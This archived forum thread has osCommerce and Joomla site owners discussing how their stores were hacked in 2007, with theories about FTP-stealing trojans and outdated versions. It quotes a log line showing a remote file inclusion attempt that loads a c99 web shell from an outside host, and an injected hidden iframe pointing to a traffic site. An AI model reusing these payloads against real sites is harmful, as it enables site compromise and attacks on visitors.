Iggy Posted April 25, 2007 Share Posted April 25, 2007 I did a lot of searching and didn't find deneme.php listed specifically anywhere in vulnerabilities or other articles on the net. Chuck deneme.php does return results on Google but nothing specific. It would be the result of an exploit but not the exploit itself and osC isn't among the results. http://www.google.com/search?client=safari...-8&oe=UTF-8 This one's kind of interesting. You're running Joomla? This one appears to be attempting to mess with the local mailserver ( vdomainaliases ) I'd cross ref the Joomla forums or post this result over there and see what they think. 85.101.6.136 - - [24/Apr/2007:15:38:25 -0500] "GET /joomla15/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http%3A%2F%2Fseawizardssoulcrew.com%2Fgb%2Fpublic%2Fc99.txt%3F&act=img&img=back HTTP/1.1" 200 131 "http://www.anotherjoe.com/joomla15/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http%3A%2F%2Fseawizardssoulcrew.com%2Fgb%2Fpublic%2Fc99.txt%3F&act=ls&d=%2Fetc%2Fvdomainaliases&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Iggy Everything's funny but nothing's a joke... Link to comment Share on other sites More sharing options...
charly Posted May 8, 2007 Share Posted May 8, 2007 Our Site Got hacked too Index files were changed and Iframe code was added, just tell me what info you want and ill give you what I can. Charly Charly My fav site Spend most my cash there dont tell the wife:-) Link to comment Share on other sites More sharing options...
ozEworks Posted May 8, 2007 Share Posted May 8, 2007 We discovered that this is more than likely a PC based virus. There is Trojan out there that gets ftp passwords from various ftp programs including Total Commander. Virus Name: Trojan-PSW.Win32.LdPinch.bok So collect ftp details from all over the place and then just automate this hack which ftps in and download and upload any files that starts "index". So check you PC, upgrade your ftp software and change your ftp passwords. Link to comment Share on other sites More sharing options...
charly Posted May 8, 2007 Share Posted May 8, 2007 We discovered that this is more than likely a PC based virus. There is Trojan out there that gets ftp passwords from various ftp programs including Total Commander. Virus Name: Trojan-PSW.Win32.LdPinch.bok So collect ftp details from all over the place and then just automate this hack which ftps in and download and upload any files that starts "index". So check you PC, upgrade your ftp software and change your ftp passwords. Ok i did sweap all pcs as well after seeing this happen, the trojan was not found. Charly My fav site Spend most my cash there dont tell the wife:-) Link to comment Share on other sites More sharing options...
ozEworks Posted May 8, 2007 Share Posted May 8, 2007 Could anyone else have your ftp details? Contractor? Freelancer? Hosting company? Because this is not a brute force attack. They have your ftp details. And so they got them somehow. Link to comment Share on other sites More sharing options...
christobal Posted July 19, 2007 Share Posted July 19, 2007 I got hacked to. An iframe code has been added to all index and default pages on my server. My host (one and one) told me, that osC has the ability to be exploited in older version. As my version is not pretty new, MS2.2, what do I need to update? Link to comment Share on other sites More sharing options...
Jack_mcs Posted July 19, 2007 Share Posted July 19, 2007 I got hacked to. An iframe code has been added to all index and default pages on my server.My host (one and one) told me, that osC has the ability to be exploited in older version. As my version is not pretty new, MS2.2, what do I need to update? There are four versions of MS2. You need to update to the latest one to have all of the security updates installed. Jack Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
karanillys Posted July 20, 2007 Share Posted July 20, 2007 nos nx zex http://s1.bitefight.gr/c.php?uid=26993 http://s4.bitefight.gr/c.php?uid=15949 Link to comment Share on other sites More sharing options...
SavageSinister Posted August 2, 2007 Share Posted August 2, 2007 I have an osCMax installation that was hacked on 7/25/07, same MO. It put this code in all the login.php, index.php and index.html files: <iframe src='http://alltraff.ru/traff.php' width='1' height='1' style='visibility: hidden;'></iframe> I've been searching for a couple of hours, both on this message board, the osCMax board and Google. Seems to happen to a lot of people, but nobody seems to know how, why or more importantly, WHAT IT DOES. If ANYbody can shed light on how this is happening to so many of us, PLEASE post it here. Link to comment Share on other sites More sharing options...
Sam666 Posted August 2, 2007 Share Posted August 2, 2007 Sure its just not a XSS exploit or an could be an SQL Injection. Link to comment Share on other sites More sharing options...
christobal Posted August 17, 2007 Share Posted August 17, 2007 Hello, I found a solution for the "hacking". It is a trojan horse virus on your PC! It collects your FTP login data and than changes the files on your server. I found a solution on the internet how to remove the virus: http://www.stoer-angler.de/angeln-forum/viewtopic.php?t=562 Sorry, it's only available in german language. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.